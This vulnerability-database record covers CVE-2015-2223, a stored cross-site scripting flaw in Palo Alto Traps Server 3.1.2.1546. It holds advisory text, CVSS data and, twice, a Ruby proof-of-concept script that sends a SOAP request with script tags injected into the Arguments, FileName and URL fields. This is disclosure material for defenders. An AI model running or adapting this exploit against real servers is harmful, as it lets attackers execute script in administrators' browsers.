{"lastseen": "2020-04-01T19:04:42", "references": [], "description": "\nPalo Alto Traps Server 3.1.2.1546 - Persistent Cross-Site Scripting", "edition": 2, "reporter": "Michael Hendrickx", "exploitpack": {"type": "webapps", "platform": "windows"}, "published": "2015-03-31T00:00:00", "title": "Palo Alto Traps Server 3.1.2.1546 - Persistent Cross-Site Scripting", "type": "exploitpack", "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-2223"]}, {"type": "exploitdb", "idList": ["EDB-ID:36580"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:131182"]}, {"type": "paloalto", "idList": ["PAN-SA-2016-0001"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32117", "SECURITYVULNS:VULN:14485"]}, {"type": "zdt", "idList": ["1337DAY-ID-23458"]}]}, "score": {"value": -0.6, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2015-2223"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:131182"]}, {"type": "paloalto", "idList": ["PAN-SA-2016-0001"]}, {"type": "zdt", "idList": ["1337DAY-ID-23458"]}]}, "exploitation": null, "vulnersScore": -0.6}, "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2223"], "modified": "2015-03-31T00:00:00", "id": "EXPLOITPACK:1BCC2DF968B7C9665293BE3C836B88DF", "href": "", "viewCount": 5, "sourceData": "#!/usr/bin/ruby\n=begin\n------------------------------------------------------------------------\nProduct: Palo Alto Traps Server (formerly Cyvera Endpoint Protection)\nVendor: Palo Alto Networks\nVulnerable Version(s): 3.1.2.1546\nTested Version: 3.1.2.1546\nAdvisory Publication: 29 March 2015 \nVendor Notification: 17 October 2014 \nVulnerability Type: Stored Cross Site Scripting \nCVE Reference: CVE-2015-2223\nRisk Level: High\nSolution Status: \nDiscovered and Provided: Michael Hendrickx, help AG\n------------------------------------------------------------------------\n\nAbout the product:\nPalo Alto Traps is an advanced endpoint protection suite that detects attacks 
such as memory corruption, executable child processes, DLL hijacking, etc. Aside from optionally blocking it, it sends this \u201ctrap\u201d to a central server for logging purposes.\n\nAbout the vulnerability:\nAn attacker can send a SOAP request with JavaScript embedded inside it, which gets stored in the database. When an administrator monitors the Traps\u2019 admin screen and opens details about the vulnerability, the JavaScript is executed on the admin browser.\n\nThe XSS works in the <b:Arguments>, <b:FileName> and <b:URL> parameters, for example:\n\n <b:Arguments>\"C:\\\\Users\\\\Michael\\\\fake.exe\" \n <script>\n alert(\"xss\");\n </script>\n </b:Arguments>\n\nA POC script can be found at the following URL:\nhttps://github.com/ndrix/random-scripts/blob/master/pa_traps_xss.rb\n\n------------------------------------------------------------------------\n\nSolution:\n\nThe vendor was notified back in October 2014, and we\u2019ve sent a few follow ups since. Contact the vendor for the patch details. \n\nReferences:\n\n[1] help AG middle East: http://www.helpag.com/ \n[2] Palo Alto Traps: https://www.paloaltonetworks.com/products/endpoint-security.html \n------------------------------------------------------------------------\n=end\n\n# PA traps fuzzer? 
:)\n\nrequire 'net/http'\n\ndef usage\n\tputs \"pa_traps.rb <trapserver>\"\n\texit\nend\n\nusage if ARGV.empty?\n\n# get the arguments\ntraps = {}\ntraps[:server] = ARGV[0]\ntraps[:port] = 2125\n\nhttp_headers = {\n\t\"Content-Type\" => \"application/soap+xml; charset=utf-8\", \n\t\"Expect\" => \"100-continue\",\n\t\"Connection\" => \"Keep-Alive\"\n}\n\nsoap_envelope = <<-SOAP\n<s:Envelope xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:a=\"http://www.w3.org/2005/08/addressing\">\n\t<s:Header>\n\t\t<a:Action s:mustUnderstand=\"1\">http://tempuri.org/IClientServices/SendPreventions</a:Action>\n\t\t<a:MessageID>urn:uuid:d1bdb437-ea8e-47e8-8167-6cfd69655f43</a:MessageID>\n\t\t<a:ReplyTo>\n\t\t\t<a:Address>http://www.w3.org/2005/08/addressing/anonymous</a:Address>\n\t\t</a:ReplyTo>\n\t\t<a:To s:mustUnderstand=\"1\">http://10.13.6.82:2125/CyveraServer/</a:To>\n\t</s:Header>\n\t<s:Body>\n\t\t<SendPreventions xmlns=\"http://tempuri.org/\">\n\t\t\t<machine>VMNAME1</machine>\n\t\t\t<preventions xmlns:b=\"http://schemas.datacontract.org/2004/07/Cyvera.Common.Interfaces\" xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\">\n\t\t\t\t<b:PreventionDetails>\n\t\t\t\t\t<b:Id>0</b:Id>\n\t\t\t\t\t<b:MachineName>AEDXBNB-MHE</b:MachineName>\n\t\t\t\t\t<b:Message>Exploit attempt was prevented by Traps</b:Message>\n\t\t\t\t\t<b:PreventionKey>116215ce-65e2-4b77-b176-6c0279d12c37</b:PreventionKey>\n\t\t\t\t\t<b:ProcessName>Excel.exe</b:ProcessName>\n\t\t\t\t\t<b:Time>2014-10-15T13:18:56</b:Time>\n\t\t\t\t\t<b:UserName> HELPAG\\\\hendrickx </b:UserName>\n\t\t\t\t\t<b:Arguments>\"C:\\\\Users\\\\Michael\\\\fake.exe\" \n\t\t\t\t\t\t<script>\n\t\t\t\t\t\t\talert(\"xss\");\n\t\t\t\t\t\t</script>\n\t\t\t\t\t</b:Arguments>\n\t\t\t\t\t<b:CyveraCode>EXEPROT</b:CyveraCode>\n\t\t\t\t\t<b:CyveraInternalCode 
i:nil=\"true\"/>\n\t\t\t\t\t<b:CyveraVersion>3.1.2.1546</b:CyveraVersion>\n\t\t\t\t\t<b:FileName>\n\t\t\t\t\t\t<script>\n\t\t\t\t\t\t\talert(\"xss\");\n\t\t\t\t\t\t</script>\n\t\t\t\t\t</b:FileName>\n\t\t\t\t\t<b:PreventionMode>Notify</b:PreventionMode>\n\t\t\t\t\t<b:ProcessHash i:nil=\"true\"/>\n\t\t\t\t\t<b:ProcessVersion>1.12.1.0</b:ProcessVersion>\n\t\t\t\t\t<b:Sent>false</b:Sent>\n\t\t\t\t\t<b:SentToServerTime>0001-01-01T00:00:00</b:SentToServerTime>\n\t\t\t\t\t<b:Source>Unknown</b:Source>\n\t\t\t\t\t<b:Status i:nil=\"true\"/>\n\t\t\t\t\t<b:URL>\n\t\t\t\t\t\t<script>\n\t\t\t\t\t\t\talert(\"xss in URL\");\n\t\t\t\t\t\t</script>\n\t\t\t\t\t</b:URL>\n\t\t\t\t</b:PreventionDetails>\n\t\t\t</preventions>\n\t\t</SendPreventions>\n\t</s:Body>\n</s:Envelope>\nSOAP\n\nif traps[:server].empty?\n\tputs \"Need a traps server\"\n\tusage\nend\n\n# summary\nputs \"Testing #{traps[:server]}\"\n\nNet::HTTP.start(traps[:server], traps[:port]) do |http|\n\tr1 = http.request_post('/CyveraServer/', soap_envelope, http_headers);\n\tputs r1\n\tputs r1.inspect\nend", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {}, "scheme": null, "_state": {"dependencies": 1659994789, "score": 1659995475}, "_internal": {"score_hash": "b3256a38ba6f73cfb7c4f5ce548c3869"}}
{"paloalto": [{"lastseen": "2021-07-28T14:33:10", "description": "A cross-site scripting vulnerability exists in the web-based console management. This vulnerability has been assigned CVE-2015-2223.\nThis issue affects the management interface of Traps, where an authenticated administrator may be tricked into injecting malicious JavaScript into the web UI interface.\nThis issue affects Traps ESM Console version 3.2.1 and earlier\n\n**Work around:**\nNo work around available.", "cvss3": {}, "published": "2016-02-23T08:00:00", "type": "paloalto", "title": "ESM Console XSS vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2223"], "modified": "2016-02-23T08:00:00", "id": "PAN-SA-2016-0001", "href": "https://securityadvisories.paloaltonetworks.com/CVE-2015-2223", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "zdt": [{"lastseen": "2018-01-03T21:14:04", "description": "Exploit for windows platform in category web applications", "cvss3": {}, "published": "2015-04-02T00:00:00", "type": "zdt", "title": "Palo Alto Traps Server 3.1.2.1546 - Persistent XSS Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-2223"], "modified": "2015-04-02T00:00:00", "id": "1337DAY-ID-23458", "href": "https://0day.today/exploit/description/23458", "sourceData": "#!/usr/bin/ruby\r\n=begin\r\n------------------------------------------------------------------------\r\nProduct: Palo Alto Traps Server (formerly Cyvera Endpoint Protection)\r\nVendor: Palo Alto 
Networks\r\nVulnerable Version(s): 3.1.2.1546\r\nTested Version: 3.1.2.1546\r\nAdvisory Publication: 29 March 2015\r\nVendor Notification: 17 October 2014\r\nVulnerability Type: Stored Cross Site Scripting\r\nCVE Reference: CVE-2015-2223\r\nRisk Level: High\r\nSolution Status:\r\nDiscovered and Provided: Michael Hendrickx, help AG\r\n------------------------------------------------------------------------\r\n \r\nAbout the product:\r\nPalo Alto Traps is an advanced endpoint protection suite that detects attacks such as memory corruption, executable child processes, DLL hijacking, etc. Aside from optionally blocking it, it sends this \u201ctrap\u201d to a central server for logging purposes.\r\n \r\nAbout the vulnerability:\r\nAn attacker can send a SOAP request with JavaScript embedded inside it, which gets stored in the database. When an administrator monitors the Traps\u2019 admin screen and opens details about the vulnerability, the JavaScript is executed on the admin browser.\r\n \r\nThe XSS works in the <b:Arguments>, <b:FileName> and <b:URL> parameters, for example:\r\n \r\n <b:Arguments>\"C:\\\\Users\\\\Michael\\\\fake.exe\"\r\n <script>\r\n alert(\"xss\");\r\n </script>\r\n </b:Arguments>\r\n \r\nA POC script can be found at the following URL:\r\nhttps://github.com/ndrix/random-scripts/blob/master/pa_traps_xss.rb\r\n \r\n------------------------------------------------------------------------\r\n \r\nSolution:\r\n \r\nThe vendor was notified back in October 2014, and we\u2019ve sent a few follow ups since. Contact the vendor for the patch details. \r\n \r\nReferences:\r\n \r\n[1] help AG middle East: http://www.helpag.com/\r\n[2] Palo Alto Traps: https://www.paloaltonetworks.com/products/endpoint-security.html\r\n------------------------------------------------------------------------\r\n=end\r\n \r\n# PA traps fuzzer? 
:)\r\n \r\nrequire 'net/http'\r\n \r\ndef usage\r\n puts \"pa_traps.rb <trapserver>\"\r\n exit\r\nend\r\n \r\nusage if ARGV.empty?\r\n \r\n# get the arguments\r\ntraps = {}\r\ntraps[:server] = ARGV[0]\r\ntraps[:port] = 2125\r\n \r\nhttp_headers = {\r\n \"Content-Type\" => \"application/soap+xml; charset=utf-8\",\r\n \"Expect\" => \"100-continue\",\r\n \"Connection\" => \"Keep-Alive\"\r\n}\r\n \r\nsoap_envelope = <<-SOAP\r\n<s:Envelope xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:a=\"http://www.w3.org/2005/08/addressing\">\r\n <s:Header>\r\n <a:Action s:mustUnderstand=\"1\">http://tempuri.org/IClientServices/SendPreventions</a:Action>\r\n <a:MessageID>urn:uuid:d1bdb437-ea8e-47e8-8167-6cfd69655f43</a:MessageID>\r\n <a:ReplyTo>\r\n <a:Address>http://www.w3.org/2005/08/addressing/anonymous</a:Address>\r\n </a:ReplyTo>\r\n <a:To s:mustUnderstand=\"1\">http://10.13.6.82:2125/CyveraServer/</a:To>\r\n </s:Header>\r\n <s:Body>\r\n <SendPreventions xmlns=\"http://tempuri.org/\">\r\n <machine>VMNAME1</machine>\r\n <preventions xmlns:b=\"http://schemas.datacontract.org/2004/07/Cyvera.Common.Interfaces\" xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\">\r\n <b:PreventionDetails>\r\n <b:Id>0</b:Id>\r\n <b:MachineName>AEDXBNB-MHE</b:MachineName>\r\n <b:Message>Exploit attempt was prevented by Traps</b:Message>\r\n <b:PreventionKey>116215ce-65e2-4b77-b176-6c0279d12c37</b:PreventionKey>\r\n <b:ProcessName>Excel.exe</b:ProcessName>\r\n <b:Time>2014-10-15T13:18:56</b:Time>\r\n <b:UserName> HELPAG\\\\hendrickx </b:UserName>\r\n <b:Arguments>\"C:\\\\Users\\\\Michael\\\\fake.exe\"\r\n <script>\r\n alert(\"xss\");\r\n </script>\r\n </b:Arguments>\r\n <b:CyveraCode>EXEPROT</b:CyveraCode>\r\n <b:CyveraInternalCode i:nil=\"true\"/>\r\n <b:CyveraVersion>3.1.2.1546</b:CyveraVersion>\r\n <b:FileName>\r\n <script>\r\n alert(\"xss\");\r\n </script>\r\n </b:FileName>\r\n <b:PreventionMode>Notify</b:PreventionMode>\r\n <b:ProcessHash i:nil=\"true\"/>\r\n 
<b:ProcessVersion>1.12.1.0</b:ProcessVersion>\r\n <b:Sent>false</b:Sent>\r\n <b:SentToServerTime>0001-01-01T00:00:00</b:SentToServerTime>\r\n <b:Source>Unknown</b:Source>\r\n <b:Status i:nil=\"true\"/>\r\n <b:URL>\r\n <script>\r\n alert(\"xss in URL\");\r\n </script>\r\n </b:URL>\r\n </b:PreventionDetails>\r\n </preventions>\r\n </SendPreventions>\r\n </s:Body>\r\n</s:Envelope>\r\nSOAP\r\n \r\nif traps[:server].empty?\r\n puts \"Need a traps server\"\r\n usage\r\nend\r\n \r\n# summary\r\nputs \"Testing #{traps[:server]}\"\r\n \r\nNet::HTTP.start(traps[:server], traps[:port]) do |http|\r\n r1 = http.request_post('/CyveraServer/', soap_envelope, http_headers);\r\n puts r1\r\n puts r1.inspect\r\nend\n\n# 0day.today [2018-01-03] #", "sourceHref": "https://0day.today/exploit/23458", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:16:38", "description": "", "published": "2015-03-30T00:00:00", "type": "packetstorm", "title": "Palo Alto Traps Server 3.1.2.1546 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2223"], "modified": "2015-03-30T00:00:00", "id": "PACKETSTORM:131182", "href": "https://packetstormsecurity.com/files/131182/Palo-Alto-Traps-Server-3.1.2.1546-Cross-Site-Scripting.html", "sourceData": "`------------------------------------------------------------------------ \nProduct: Palo Alto Traps Server (formerly Cyvera Endpoint Protection) \nVendor: Palo Alto Networks \nVulnerable Version(s): 3.1.2.1546 \nTested Version: 3.1.2.1546 \nAdvisory Publication: 29 March 2015 \nVendor Notification: 17 October 2014 \nVulnerability Type: Stored Cross Site Scripting \nCVE Reference: CVE-2015-2223 \nRisk Level: High \nSolution Status: \nDiscovered and Provided: Michael Hendrickx, help AG \n------------------------------------------------------------------------ \n \nAbout the product: \nPalo Alto Traps is an advanced endpoint protection suite that detects 
attacks such as memory corruption, executable child processes, DLL hijacking, etc. Aside from optionally blocking it, it sends this \u201ctrap\u201d to a central server for logging purposes. \n \nAbout the vulnerability: \nAn attacker can send a SOAP request with JavaScript embedded inside it, which gets stored in the database. When an administrator monitors the Traps\u2019 admin screen and opens details about the vulnerability, the JavaScript is executed on the admin browser. \n \nThe XSS works in the <b:Arguments>, <b:FileName> and <b:URL> parameters, for example: \n \n<b:Arguments>\"C:\\\\Users\\\\Michael\\\\fake.exe\" \n<script> \nalert(\"xss\"); \n</script> \n</b:Arguments> \n \nA POC script can be found at the following URL: \nhttps://github.com/ndrix/random-scripts/blob/master/pa_traps_xss.rb \n \n------------------------------------------------------------------------ \n \nSolution: \n \nThe vendor was notified back in October 2014, and we\u2019ve sent a few follow ups since. Contact the vendor for the patch details. 
\n \nReferences: \n \n[1] help AG middle East: http://www.helpag.com/ \n[2] Palo Alto Traps: https://www.paloaltonetworks.com/products/endpoint-security.html \n------------------------------------------------------------------------ \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/131182/pats-xss.txt"}], "securityvulns": [{"lastseen": "2021-06-08T19:14:53", "description": "Stored XSS in logs.", "edition": 2, "cvss3": {}, "published": "2015-05-12T00:00:00", "type": "securityvulns", "title": "Palo Alto Traps Server XSS", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2223"], "modified": "2015-05-12T00:00:00", "id": "SECURITYVULNS:VULN:14485", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14485", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:59", "description": "\r\n\r\n------------------------------------------------------------------------\r\nProduct: Palo Alto Traps Server (formerly Cyvera Endpoint Protection)\r\nVendor: Palo Alto Networks\r\nVulnerable Version(s): 3.1.2.1546\r\nTested Version: 3.1.2.1546\r\nAdvisory Publication: 29 March 2015 \r\nVendor Notification: 17 October 2014 \r\nVulnerability Type: Stored Cross Site Scripting \r\nCVE Reference: CVE-2015-2223\r\nRisk Level: High\r\nSolution Status: \r\nDiscovered and Provided: Michael Hendrickx, help 
AG\r\n------------------------------------------------------------------------\r\n\r\nAbout the product:\r\nPalo Alto Traps is an advanced endpoint protection suite that detects attacks such as memory corruption, executable child processes, DLL hijacking, etc. Aside from optionally blocking it, it sends this \u201ctrap\u201d to a central server for logging purposes.\r\n\r\nAbout the vulnerability:\r\nAn attacker can send a SOAP request with JavaScript embedded inside it, which gets stored in the database. When an administrator monitors the Traps\u2019 admin screen and opens details about the vulnerability, the JavaScript is executed on the admin browser.\r\n\r\nThe XSS works in the <b:Arguments>, <b:FileName> and <b:URL> parameters, for example:\r\n\r\n <b:Arguments>\"C:\\Users\\Michael\\fake.exe\" \r\n <script>\r\n alert(\"xss\");\r\n </script>\r\n </b:Arguments>\r\n\r\nA POC script can be found at the following URL:\r\nhttps://github.com/ndrix/random-scripts/blob/master/pa_traps_xss.rb\r\n\r\n------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nThe vendor was notified back in October 2014, and we\u2019ve sent a few follow ups since. Contact the vendor for the patch details. 
\r\n\r\nReferences:\r\n\r\n[1] help AG middle East: http://www.helpag.com/ \r\n[2] Palo Alto Traps: https://www.paloaltonetworks.com/products/endpoint-security.html \r\n------------------------------------------------------------------------\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2015-05-12T00:00:00", "title": "CVE-2015-2223: Palo Alto Traps Server Stored XSS", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2223"], "modified": "2015-05-12T00:00:00", "id": "SECURITYVULNS:DOC:32117", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32117", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "cve": [{"lastseen": "2022-03-23T12:10:10", "description": "Multiple cross-site scripting (XSS) vulnerabilities in the web-based console management interface in Palo Alto Networks Traps (formerly Cyvera Endpoint Protection) 3.1.2.1546 allow remote attackers to inject arbitrary web script or HTML via the (1) Arguments, (2) FileName, or (3) URL parameter in a SOAP request.", "cvss3": {}, "published": "2015-04-14T14:59:00", "type": "cve", "title": "CVE-2015-2223", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": 
"AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2223"], "modified": "2018-10-09T19:56:00", "cpe": ["cpe:/a:palo_alto_networks:traps:3.1.2.1546"], "id": "CVE-2015-2223", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2223", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:palo_alto_networks:traps:3.1.2.1546:*:*:*:*:*:*:*"]}]}